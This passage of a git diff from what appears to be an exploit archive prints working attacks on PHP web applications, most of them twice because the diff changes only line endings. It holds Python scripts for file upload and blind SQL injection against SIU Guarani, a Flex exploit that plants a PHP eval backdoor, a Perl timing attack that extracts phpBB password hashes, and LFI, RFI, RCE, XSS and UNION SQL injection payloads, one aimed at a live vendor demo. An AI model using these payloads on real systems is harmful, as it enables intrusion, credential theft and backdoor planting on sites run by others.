the authors will not be +# responsible for any damage. + +import pycurl +import StringIO +import sys + +if len(sys.argv) < 3: + print "SIU guarani file upload" + print "usage : " + sys.argv[0] + " <server> <local file>" + print "example : " + sys.argv[0] + " someuni.edu.ar/somedir someporn.jpg" + sys.exit(1) + +print "getting phpsessid.." +c = pycurl.Curl() +c.setopt(c.URL, "http://" + sys.argv[1] + "/inicial.php") +c.setopt(c.COOKIEJAR, "/tmp/guaranicookie") +c.setopt(c.WRITEFUNCTION, (lambda x : None)) +c.perform() +c.close() + +print "uploading file.." +r = StringIO.StringIO() +c = pycurl.Curl() +c.setopt(c.POST, 1) +c.setopt(c.URL, "http://" + sys.argv[1] + "/a_docentes/subirArchivo.php") +c.setopt(c.HTTPPOST, [("archivo", (c.FORM_FILE, sys.argv[2]))]) +c.setopt(c.COOKIEFILE, "/tmp/guaranicookie") +c.setopt(c.WRITEFUNCTION, r.write) +c.perform() +r.seek(0) +s = r.read() +r.close() +c.close() +s = (s.split("'../library/bajarArchivo.php?qs="))[1] +s = (s.split("'"))[0] +print "your download link is http://" + sys.argv[1] + "/library/bajarArchivo.php?qs=" + s +print "in order to download the file, first you'll need to join http://" + sys.argv[1] + "/ with your web browser" +# EOF + +bind sql injection +^^^^^^^^^^^^^^^^^^ +#!/bin/python +# target : SIU Guarani +# file : 4791 +# quote : "el poporembo como una flor", quintin +# disclaimer : all the information and code given in this document is provided "as is", for educational purposes only. the authors will not be +# responsible for any damage. 
+ +import pycurl +import StringIO +import sys + +def dic_sql(s, i, x, y): + num = "SUBSTRING(" + s + " FROM " + str(i) + " FOR 1)" + return "(" + num + " >= '" + chr(x) + "') AND (" + num + " <= '" + chr(y) + "')" + +maxsize = 32 + +if len(sys.argv) < 3: + print "SIU guarani blind sql execution" + print "usage : " + sys.argv[0] + " <server> <sql string to match> [maxsize=32]" + print "example : " + sys.argv[0] + " http://someuni.edu.ar/somedir USER" + print "remember, it's an informix database" + print "https support!" + sys.exit(1) + +if len(sys.argv) > 3: + maxsize = int(sys.argv[3]) + +print "getting phpsessid.." +c = pycurl.Curl() + +if (sys.argv[1][0:5] == "https"): + c.setopt(c.SSL_VERIFYPEER, 0) +c.setopt(c.URL, sys.argv[1] + "/inicial.php") +c.setopt(c.COOKIEJAR, "/tmp/guaranicookie") +c.setopt(c.WRITEFUNCTION, (lambda x : None)) +c.perform() +c.close() + +print "cracking sql result.." + +for l in range(1, maxsize + 1): + i = 48 + f = 125 + c = pycurl.Curl() + r = StringIO.StringIO() + if (sys.argv[1][0:5] == "https"): + c.setopt(c.SSL_VERIFYPEER, 0) + c.setopt(c.POST, 1) + c.setopt(c.URL, sys.argv[1] + "/a_general/verMensajes.php") + c.setopt(c.COOKIEFILE, "/tmp/guaranicookie") + c.setopt(c.WRITEFUNCTION, r.write) + + while i <> f: + sql = dic_sql(sys.argv[2], l, i, i+(f-i)/2) + c.setopt(c.HTTPPOST, [("operacion", "gda0011' || case when (" + sql + ") then '1' else '2' end || '"), ("ver", "T")]) + c.perform() + r.seek(0) + s = r.read() + r.truncate(0) + if len(s) == 0: + print "uhm... looks like a wrong sql string!" + sys.exit(1) + if len(s.split("No hay mensajes.")) > 1 or len(s.split("Anuncio")) > 1: + f = i + (f - i) / 2 + else: + i = i + (f - i) / 2 + 1 + r.close() + c.close() + if i == 125: + break + sys.stdout.write(chr(i)) + sys.stdout.flush() +sys.stdout.write('\n') +# EOF + +# milw0rm.com [2008-12-08] diff --git a/platforms/php/webapps/7383.txt b/platforms/php/webapps/7383.txt index 3f9b5e9f0..032de1c87 100755 --- a/platforms/php/webapps/7383.txt 
+++ b/platforms/php/webapps/7383.txt 
@@ -1,38 +1,38 @@
-Simple Directory Listing 2 - Cross Site File Upload
--------------------------------------------------------------------------------
-<mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" creationComplete="onAppInit()">
- <mx:Script>
- /*
- Written by Michael Brooks
-
- VUlerablity type: Cross Site File Upload.
- Affects: SDL 2.1 beta1
- Product homepage: http://simpledirectorylisting.net/
-
- SDL has 22+ million downloads from sourceforge.net!
- The top three php projects where hacked in one day using .
-
- Exploit built using Flex 3.2 (http://www.adobe.com/go/flex_trial)
- uploads ./backdoor.php in the same directory as SDL2.php
- Backdoor Useage:
- http://10.1.1.155/backdoor.php?e=phpinfo();
- backdoor code:
- <?php eval($_GET[e])?>
-
- More info on Cross Site File Upload Attacks:
- http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/
- Inspired by the work of Petko D. Petkov; pdp
- * GNUCITIZEN
- **/
- import flash.net.*;
- private function onAppInit():void{
- var request:URLRequest = new URLRequest("http://10.1.1.155/SDL2.php?action=module&module=ModuleUpload&moduleParams[action]=upload&moduleParams[cwdRelPath]=");
- request.requestHeaders.push(new URLRequestHeader('Content-Type', 'multipart/form-data; boundary=---------------------------109092118919201'));
- request.data = unescape('-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22file%22%3B filename%3D%22backdoor.php%22%0D%0AContent-Type%3A text%2Fplain%0D%0A%0D%0A%3C%3Fphp eval%28stripslashes%28%24_GET%5Be%5D%29%29%3F%3E%0D%0A-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22upload%22%0D%0A%0D%0AUpload%0D%0A-----------------------------109092118919201--%0A');
- request.method = URLRequestMethod.POST;
- navigateToURL(request, '_self');
- }
- </mx:Script>
-</mx:Application>
-
-# milw0rm.com [2008-12-08]
+Simple Directory Listing 2 - Cross Site File Upload
+--------------------------------------------------------------------------------
+<mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" creationComplete="onAppInit()">
+ <mx:Script>
+ /*
+ Written by Michael Brooks
+
+ VUlerablity type: Cross Site File Upload.
+ Affects: SDL 2.1 beta1
+ Product homepage: http://simpledirectorylisting.net/
+
+ SDL has 22+ million downloads from sourceforge.net!
+ The top three php projects where hacked in one day using .
+
+ Exploit built using Flex 3.2 (http://www.adobe.com/go/flex_trial)
+ uploads ./backdoor.php in the same directory as SDL2.php
+ Backdoor Useage:
+ http://10.1.1.155/backdoor.php?e=phpinfo();
+ backdoor code:
+ <?php eval($_GET[e])?>
+
+ More info on Cross Site File Upload Attacks:
+ http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/
+ Inspired by the work of Petko D. Petkov; pdp
+ * GNUCITIZEN
+ **/
+ import flash.net.*;
+ private function onAppInit():void{
+ var request:URLRequest = new URLRequest("http://10.1.1.155/SDL2.php?action=module&module=ModuleUpload&moduleParams[action]=upload&moduleParams[cwdRelPath]=");
+ request.requestHeaders.push(new URLRequestHeader('Content-Type', 'multipart/form-data; boundary=---------------------------109092118919201'));
+ request.data = unescape('-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22file%22%3B filename%3D%22backdoor.php%22%0D%0AContent-Type%3A text%2Fplain%0D%0A%0D%0A%3C%3Fphp eval%28stripslashes%28%24_GET%5Be%5D%29%29%3F%3E%0D%0A-----------------------------109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22upload%22%0D%0A%0D%0AUpload%0D%0A-----------------------------109092118919201--%0A');
+ request.method = URLRequestMethod.POST;
+ navigateToURL(request, '_self');
+ }
+ </mx:Script>
+</mx:Application>
+
+# milw0rm.com [2008-12-08]
diff --git a/platforms/php/webapps/7386.pl b/platforms/php/webapps/7386.pl
index ddd56fc5e..a8b630458 100755
--- a/platforms/php/webapps/7386.pl
+++ b/platforms/php/webapps/7386.pl 
@@ -1,71 +1,71 @@
-#!/usr/bin/perl
-# ---------------------------------------------------------------
-# phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit
-# by athos - staker[at]hotmail[dot]it
-# http://bx67212.netsons.org/forum/viewforum.php?f=3
-# ---------------------------------------------------------------
-# Note: Works regardless PHP.ini settings!
-# Thanks meh also know as cHoBi
-# ---------------------------------------------------------------
-
-use strict;
-use LWP::UserAgent;
-
-my ($hash,$time1,$time2);
-
-my @chars = (48..57, 97..102);
-my $http = new LWP::UserAgent;
-
-my $host = shift;
-my $table = shift;
-my $myid = shift or &usage;
-
-
-sub injection
-{
- my ($sub,$char) = @_;
-
- return "/tag_board.php?mode=controlpanel&action=delete&id=".
- "1+and+(select+if((ascii(substring(user_password,${sub},1)".
- ")=${char}),benchmark(230000000,char(0)),0)+from+${table}_us".
- "ers+where+user_id=${myid})--";
-}
-
-
-sub usage
-{
- print STDOUT "Usage: perl $0 [host] [table_prefix] [user_id]\n";
- print STDOUT "Howto: perl $0 http://localhost/phpBB phpbb 2\n";
- print STDOUT "by athos - staker[at]hotmail[dot]it\n";
- exit;
-}
-
-
-syswrite(STDOUT,'Hash MD5: ');
-
-for my $i(1..33)
-{
- for my $j(0..16)
- {
- $time1 = time();
-
- $http->get($host.injection($i,$chars[$j]));
-
- $time2 = time();
-
- if($time2 - $time1 > 6)
- {
- syswrite(STDOUT,chr($chars[$j]));
- $hash .= chr($chars[$j]);
- last;
- }
-
- if($i == 1 && length $hash < 0)
- {
- syswrite(STDOUT,"Exploit Failed!\n");
- exit;
- }
- }
-}
-
-# milw0rm.com [2008-12-08]
+#!/usr/bin/perl
+# ---------------------------------------------------------------
+# phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit
+# by athos - staker[at]hotmail[dot]it
+# http://bx67212.netsons.org/forum/viewforum.php?f=3
+# ---------------------------------------------------------------
+# Note: Works regardless PHP.ini settings!
+# Thanks meh also know as cHoBi
+# ---------------------------------------------------------------
+
+use strict;
+use LWP::UserAgent;
+
+my ($hash,$time1,$time2);
+
+my @chars = (48..57, 97..102);
+my $http = new LWP::UserAgent;
+
+my $host = shift;
+my $table = shift;
+my $myid = shift or &usage;
+
+
+sub injection
+{
+ my ($sub,$char) = @_;
+
+ return "/tag_board.php?mode=controlpanel&action=delete&id=".
+ "1+and+(select+if((ascii(substring(user_password,${sub},1)".
+ ")=${char}),benchmark(230000000,char(0)),0)+from+${table}_us".
+ "ers+where+user_id=${myid})--";
+}
+
+
+sub usage
+{
+ print STDOUT "Usage: perl $0 [host] [table_prefix] [user_id]\n";
+ print STDOUT "Howto: perl $0 http://localhost/phpBB phpbb 2\n";
+ print STDOUT "by athos - staker[at]hotmail[dot]it\n";
+ exit;
+}
+
+
+syswrite(STDOUT,'Hash MD5: ');
+
+for my $i(1..33)
+{
+ for my $j(0..16)
+ {
+ $time1 = time();
+
+ $http->get($host.injection($i,$chars[$j]));
+
+ $time2 = time();
+
+ if($time2 - $time1 > 6)
+ {
+ syswrite(STDOUT,chr($chars[$j]));
+ $hash .= chr($chars[$j]);
+ last;
+ }
+
+ if($i == 1 && length $hash < 0)
+ {
+ syswrite(STDOUT,"Exploit Failed!\n");
+ exit;
+ }
+ }
+}
+
+# milw0rm.com [2008-12-08]
diff --git a/platforms/php/webapps/7388.txt b/platforms/php/webapps/7388.txt
index cd196c511..018f95e17 100755
--- a/platforms/php/webapps/7388.txt
+++ b/platforms/php/webapps/7388.txt
@@ -1,87 +1,86 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ######################################################### - # [ webcaf <= 1.4 ] Multiple Remote Vulnerabilities # - ######################################################### - # - # Script: "WebCAF is a web-based child and family database developed by Head Start of Lane County..." - # - # Script site: http://www.webcaf.org/ - # Download: http://www.webcaf.net/downloads/webcaf-1.4.tar.gz - # - # [Arbitrary File Delete Vulnerability] - # Vuln: http://site.com/webcaf/index.php?user_uid=../../../../../../etc/shadow ;) - # - # Bug: ./webcaf/index.php (lines: 49-50 and 61-63) - # - # ... - # // Login, if necessary - # if (!$user_uid) include("modules/login.php"); - # ... - # if ($_REQUEST[op] != "update") { - # if (file_exists("local/tmp/.$user_uid")) unlink("local/tmp/.$user_uid"); - # } - # ... - # - # - # [LFI] - # Vuln: http://strcpy.pl/webcaf/webcaf/?user_uid=1&op=forms&form=../../../../../../../../../../../../etc/passwd - # http://strcpy.pl/webcaf/webcaf/?user_uid=1&op=reports&report=../../../../../../../../../../../../etc/passwd - # - # Bug: ./webcaf/index.php (lines: 68-131) - # - # ... - # switch ($_REQUEST[op]) { - # ... - # case "forms": - # $_REQUEST[form] ? include("local/forms/$_REQUEST[form]") : include("modules/forms.php"); //LFI - # break; - # ... - # case "reports": - # $_REQUEST[report] ? include("local/reports/$_REQUEST[report]") : include("modules/reports.php"); //LFI - # break; - # ... - # } - # ... - # - # Vuln: http://strcpy.pl/webcaf/webcaf/modules/view.php?view=../../../../../../../../../../../etc/passwd%00 - # - # Bug: ./webcaf/modules/view.php (lines: 12-21) - # - # ... - # if ($_REQUEST[view]) { - # ... - # include("views/$_REQUEST[view].php"); //LFI - # } - # ... 
- # - # - # [RCE] - # Vuln: http://site.com/webcaf/about.php?_WEBCAF[db_database]=asfa%22;id%3E/tmp/aaa.txt;false%20%22 - # - # Bug: ./webcaf/index.php (lines: 127) - # - # ... - # $str_result = system("$str_mysql --database=\"$_WEBCAF[db_database]\" --user=\"$_WEBCAF[db_username]\" --password=\"$_WEBCAF[db_password]\" --html --execute=\"status\""); - # ... - # - # and a lot of other bugz... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-12-08] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ######################################################### + # [ webcaf <= 1.4 ] Multiple Remote Vulnerabilities # + ######################################################### + # + # Script: "WebCAF is a web-based child and family database developed by Head Start of Lane County..." + # + # Script site: http://www.webcaf.org/ + # Download: http://www.webcaf.net/downloads/webcaf-1.4.tar.gz + # + # [Arbitrary File Delete Vulnerability] + # Vuln: http://site.com/webcaf/index.php?user_uid=../../../../../../etc/shadow ;) + # + # Bug: ./webcaf/index.php (lines: 49-50 and 61-63) + # + # ... + # // Login, if necessary + # if (!$user_uid) include("modules/login.php"); + # ... + # if ($_REQUEST[op] != "update") { + # if (file_exists("local/tmp/.$user_uid")) unlink("local/tmp/.$user_uid"); + # } + # ... 
+ # + # + # [LFI] + # Vuln: http://strcpy.pl/webcaf/webcaf/?user_uid=1&op=forms&form=../../../../../../../../../../../../etc/passwd + # http://strcpy.pl/webcaf/webcaf/?user_uid=1&op=reports&report=../../../../../../../../../../../../etc/passwd + # + # Bug: ./webcaf/index.php (lines: 68-131) + # + # ... + # switch ($_REQUEST[op]) { + # ... + # case "forms": + # $_REQUEST[form] ? include("local/forms/$_REQUEST[form]") : include("modules/forms.php"); //LFI + # break; + # ... + # case "reports": + # $_REQUEST[report] ? include("local/reports/$_REQUEST[report]") : include("modules/reports.php"); //LFI + # break; + # ... + # } + # ... + # + # Vuln: http://strcpy.pl/webcaf/webcaf/modules/view.php?view=../../../../../../../../../../../etc/passwd%00 + # + # Bug: ./webcaf/modules/view.php (lines: 12-21) + # + # ... + # if ($_REQUEST[view]) { + # ... + # include("views/$_REQUEST[view].php"); //LFI + # } + # ... + # + # + # [RCE] + # Vuln: http://site.com/webcaf/about.php?_WEBCAF[db_database]=asfa%22;id%3E/tmp/aaa.txt;false%20%22 + # + # Bug: ./webcaf/index.php (lines: 127) + # + # ... + # $str_result = system("$str_mysql --database=\"$_WEBCAF[db_database]\" --user=\"$_WEBCAF[db_username]\" --password=\"$_WEBCAF[db_password]\" --html --execute=\"status\""); + # ... + # + # and a lot of other bugz... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-12-08] diff --git a/platforms/php/webapps/7392.txt b/platforms/php/webapps/7392.txt index 316d1144c..5d2b60017 100755 --- a/platforms/php/webapps/7392.txt +++ b/platforms/php/webapps/7392.txt 
@@ -1,40 +1,40 @@ -[~] PHPmyGallery v~1.0beta2 RFi/LFi Multiple Remote Vuln. -[~] -[~] download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.0beta2.zip -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] Date: 08/12/2008 -[~] -[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...! -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] ----------------------------------------------------------- - -file: - -_conf/core/common-tpl-vars.php - -c0de: - -require($confdir.'lang/langpack.'.$lang.'.php'); ( line 23 ) - -rfi: - -http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?confdir=ZoRLu.txt? - -lfi: - -http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?lang=[LFi] - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-12-09] +[~] PHPmyGallery v~1.0beta2 RFi/LFi Multiple Remote Vuln. +[~] +[~] download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.0beta2.zip +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] Date: 08/12/2008 +[~] +[~] N0T: TUM iSLAM ALEMiNiN BAYRAMINI KUTLARIM...! +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] ----------------------------------------------------------- + +file: + +_conf/core/common-tpl-vars.php + +c0de: + +require($confdir.'lang/langpack.'.$lang.'.php'); ( line 23 ) + +rfi: + +http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?confdir=ZoRLu.txt? 
+ +lfi: + +http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?lang=[LFi] + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-12-09] diff --git a/platforms/php/webapps/7395.txt b/platforms/php/webapps/7395.txt index c52b24ca5..d9077ca0b 100755 --- a/platforms/php/webapps/7395.txt +++ b/platforms/php/webapps/7395.txt 
@@ -1,23 +1,23 @@ - ############### SuB-ZeRo ############### - ############### Dz-hackers ################# - PEEL Remote SQL Injection Vulnerability ------------------------------------------------------------------------------------------------------------ - -[+]Discovred by : SuB-ZeRo -[+]Vendor URL : http://www.peel.fr/ -[+]downloader : http://www.script-masters.com/home/voir_script_php_mysql-146.html -[+]home: www.sub-z3ro.com / www.h4ck3r-dz.com -[+]ConTacTe: FbH@hotmail.com -[+]DoRk: FiNd It (SoOrY) -[+]exploit: -[+]http://[website]/[script]/lire/index.php?rubid=1+union+select+1,@@version,3-- -[+]http://[website]/[script]/index.php?rubid=1+union+select+1,@@version,3-- -[+]l!ve demo: -[+]http://demo.peel.fr/lire/index.php?rubid=1+union+select+1,@@version,3-- - ----------------------------------------------------------------------------------------------------------------------- -[+]grettz : for my best frinde x.CJP.x / sousn / bbbbbbbb / and all mouslims and eid sa3id for all arabs and mouslimme ----------------------------------------------------------------------------------------------------------------------- -SooN sub-z3ro.com - -# milw0rm.com [2008-12-09] + ############### SuB-ZeRo ############### + ############### Dz-hackers ################# + PEEL Remote SQL Injection Vulnerability +----------------------------------------------------------------------------------------------------------- + +[+]Discovred by : SuB-ZeRo +[+]Vendor URL : http://www.peel.fr/ +[+]downloader : http://www.script-masters.com/home/voir_script_php_mysql-146.html +[+]home: www.sub-z3ro.com / www.h4ck3r-dz.com +[+]ConTacTe: FbH@hotmail.com +[+]DoRk: FiNd It (SoOrY) +[+]exploit: +[+]http://[website]/[script]/lire/index.php?rubid=1+union+select+1,@@version,3-- +[+]http://[website]/[script]/index.php?rubid=1+union+select+1,@@version,3-- +[+]l!ve demo: +[+]http://demo.peel.fr/lire/index.php?rubid=1+union+select+1,@@version,3-- + 
+---------------------------------------------------------------------------------------------------------------------- +[+]grettz : for my best frinde x.CJP.x / sousn / bbbbbbbb / and all mouslims and eid sa3id for all arabs and mouslimme +---------------------------------------------------------------------------------------------------------------------- +SooN sub-z3ro.com + +# milw0rm.com [2008-12-09] diff --git a/platforms/php/webapps/7396.txt b/platforms/php/webapps/7396.txt index 827110ed5..6dcf19a08 100755 --- a/platforms/php/webapps/7396.txt +++ b/platforms/php/webapps/7396.txt 
@@ -1,23 +1,23 @@ - ############### SuB-ZeRo ############### - ############### Dz-hackers ################# - Netref 4.0 Remote SQL Injection Vulnerability ------------------------------------------------------------------------------------------------------------ - -[+]Discovred by : SuB-ZeRo -[+]Vendor URL : www.netref.net -[+]downloader : http://www.phpscripts-fr.net/scripts/download.php?id=627 -[+]home: www.sub-z3ro.com / www.h4ck3r-dz.com -[+]ConTacTe: FbH@hotmail.com -[+]DoRk: FiNd It (SoOrY) -[+]exploit: -[+]http://[website]/[script]/fiche_product.php?id=-1+union+select+1,2,password,@@version,5,6,login,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER-- -[+]http://[website]/[script]/presentation.php?id=-1+union+select+1,2,password,4,5,login,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER-- -[+]l!ve demo: -[+]http://netref.net/solutions/fiche_product.php?id=-1+union+select+1,2,password,@@version,5,6,login,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER-- - ----------------------------------------------------------------------------------------------------------------------- -[+]grettz : for my best frinde x.CJP.x / sousn / and all mouslims and eid sa3id for all arabs and mouslimme ----------------------------------------------------------------------------------------------------------------------- -sub-z3ro.com sOoN - -# milw0rm.com [2008-12-09] + ############### SuB-ZeRo ############### + ############### Dz-hackers ################# + Netref 4.0 Remote SQL Injection Vulnerability +----------------------------------------------------------------------------------------------------------- + +[+]Discovred by : SuB-ZeRo +[+]Vendor URL : www.netref.net +[+]downloader : http://www.phpscripts-fr.net/scripts/download.php?id=627 +[+]home: www.sub-z3ro.com / www.h4ck3r-dz.com +[+]ConTacTe: FbH@hotmail.com +[+]DoRk: FiNd It (SoOrY) +[+]exploit: 
+[+]http://[website]/[script]/fiche_product.php?id=-1+union+select+1,2,password,@@version,5,6,login,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER-- +[+]http://[website]/[script]/presentation.php?id=-1+union+select+1,2,password,4,5,login,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER-- +[+]l!ve demo: +[+]http://netref.net/solutions/fiche_product.php?id=-1+union+select+1,2,password,@@version,5,6,login,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER-- + +---------------------------------------------------------------------------------------------------------------------- +[+]grettz : for my best frinde x.CJP.x / sousn / and all mouslims and eid sa3id for all arabs and mouslimme +---------------------------------------------------------------------------------------------------------------------- +sub-z3ro.com sOoN + +# milw0rm.com [2008-12-09] diff --git a/platforms/php/webapps/7397.txt b/platforms/php/webapps/7397.txt index 49274d39d..a37982ea7 100755 --- a/platforms/php/webapps/7397.txt +++ b/platforms/php/webapps/7397.txt 
@@ -1,32 +1,32 @@ ----------------------------------------------------------------------------------------------------------------------------------------------------------------- - [0] GENERAL DETAILS: - -Name : ProQuiz 1.0 Sql Injection (Auth bypass) -Download : http://sourceforge.net/project/downloading.php?group_id=246466&use_mirror=kent&filename=ProQuiz.zip&65145754 -Vulnerability : Sql Injection (Admin Login Bypass) -Author : Osirys -Contact : osirys[at]live[dot]it - ----------------------------------------------------------------------------------------------------------------------------------------------------------------- - [1] BUG EXPLANATION: - -The affected file is /admin/index.php. Let's see the code. - -[CODE] -if($_GET['menu'] != 'madmin') - { - if(isset($_POST['username']) && isset($_POST['password'])) - { - $query = "SELECT * FROM ".$member_admin." WHERE `username` = '".$_POST['username']."' AND `password` = '".$_POST['password']."' "; -[/CODE] - ----------------------------------------------------------------------------------------------------------------------------------------------------------------- - [2] EXPLOITATION: - -Just go in /[path]/admin/index.php. 
Login with the following details: -Username : ' or 1=1# -Password : anything - ----------------------------------------------------------------------------------------------------------------------------------------------------------------- - -# milw0rm.com [2008-12-09] +---------------------------------------------------------------------------------------------------------------------------------------------------------------- + [0] GENERAL DETAILS: + +Name : ProQuiz 1.0 Sql Injection (Auth bypass) +Download : http://sourceforge.net/project/downloading.php?group_id=246466&use_mirror=kent&filename=ProQuiz.zip&65145754 +Vulnerability : Sql Injection (Admin Login Bypass) +Author : Osirys +Contact : osirys[at]live[dot]it + +---------------------------------------------------------------------------------------------------------------------------------------------------------------- + [1] BUG EXPLANATION: + +The affected file is /admin/index.php. Let's see the code. + +[CODE] +if($_GET['menu'] != 'madmin') + { + if(isset($_POST['username']) && isset($_POST['password'])) + { + $query = "SELECT * FROM ".$member_admin." WHERE `username` = '".$_POST['username']."' AND `password` = '".$_POST['password']."' "; +[/CODE] + +---------------------------------------------------------------------------------------------------------------------------------------------------------------- + [2] EXPLOITATION: + +Just go in /[path]/admin/index.php. Login with the following details: +Username : ' or 1=1# +Password : anything + +---------------------------------------------------------------------------------------------------------------------------------------------------------------- + +# milw0rm.com [2008-12-09] diff --git a/platforms/php/webapps/7399.txt b/platforms/php/webapps/7399.txt index 30c9bdab1..4d41d95b7 100755 --- a/platforms/php/webapps/7399.txt +++ b/platforms/php/webapps/7399.txt 
@@ -1,30 +1,30 @@ -***************************************************************************************** - -Phpmygallery-1.5beta (common-tpl-vars.php) Multiple Local File Inclusion Vulnerabilities - -***************************************************************************************** - -Script Name: Phpmygallery - -Version: 1.5beta - -Autor: CoBRa_21 - -My Site: www.ipbul.org - -Download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.5beta.zip - -***************************************************************************************** - -Exploit: - -http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?conf[lang]= [LFİ] (Windows Only) -http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?admindir=[RFI] - -***************************************************************************************** - -Not: Tüm İslam Aleminin Kurban Bayramı Mobarek Olsun - -***************************************************************************************** - -# milw0rm.com [2008-12-09] +***************************************************************************************** + +Phpmygallery-1.5beta (common-tpl-vars.php) Multiple Local File Inclusion Vulnerabilities + +***************************************************************************************** + +Script Name: Phpmygallery + +Version: 1.5beta + +Autor: CoBRa_21 + +My Site: www.ipbul.org + +Download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.5beta.zip + +***************************************************************************************** + +Exploit: + +http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?conf[lang]= [LFİ] (Windows Only) +http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?admindir=[RFI] + +***************************************************************************************** + +Not: Tüm İslam Aleminin Kurban Bayramı Mobarek Olsun + 
+***************************************************************************************** + +# milw0rm.com [2008-12-09] diff --git a/platforms/php/webapps/740.pl b/platforms/php/webapps/740.pl index f5866cf40..78deab8f5 100755 --- a/platforms/php/webapps/740.pl +++ b/platforms/php/webapps/740.pl @@ -70,6 +70,6 @@ if($sitevul !~/http/){ $sitevul = 'http://' . $sitevul; } $teste1 = get($sitevul) or next; $teste1 = ""; } -} - -# milw0rm.com [2005-01-04] +} + +# milw0rm.com [2005-01-04] diff --git a/platforms/php/webapps/7400.txt b/platforms/php/webapps/7400.txt index d1f1a6d63..de5d127c8 100755 --- a/platforms/php/webapps/7400.txt +++ b/platforms/php/webapps/7400.txt 
@@ -1,26 +1,26 @@ -****(Lfi/xss)**** - -script: PHP_Multiple_Newsletters v2.7 - -*************************************************************************** -download from:http://www.phpmultiplenewsletters.com/modules/phpmultiplenewsletters.com/dist/free/PHP_Multiple_Newsletters_v2.7.zip - -*************************************************************************** -vul:/index.php -line 36: -include ('language/'..$_REQUEST['lang'].'.php'); - -*************************************************** -xpl: -www.site.com/path/index.php?lang=[Lfi]%00 - -xss: -www.site.com/path/index.php/>"><ScRiPt>alert(document.cookie)</ScRiPt> -................................................... -Author: ahmadbady from:iran - -my mail: kivi_hacker666@yahoo.com - -*************************************************** - -# milw0rm.com [2008-12-09] +****(Lfi/xss)**** + +script: PHP_Multiple_Newsletters v2.7 + +*************************************************************************** +download from:http://www.phpmultiplenewsletters.com/modules/phpmultiplenewsletters.com/dist/free/PHP_Multiple_Newsletters_v2.7.zip + +*************************************************************************** +vul:/index.php +line 36: +include ('language/'..$_REQUEST['lang'].'.php'); + +*************************************************** +xpl: +www.site.com/path/index.php?lang=[Lfi]%00 + +xss: +www.site.com/path/index.php/>"><ScRiPt>alert(document.cookie)</ScRiPt> +................................................... +Author: ahmadbady from:iran + +my mail: kivi_hacker666@yahoo.com + +*************************************************** + +# milw0rm.com [2008-12-09] diff --git a/platforms/php/webapps/7406.php b/platforms/php/webapps/7406.php index ca9f798a1..dcbc3ee46 100755 --- a/platforms/php/webapps/7406.php +++ b/platforms/php/webapps/7406.php 
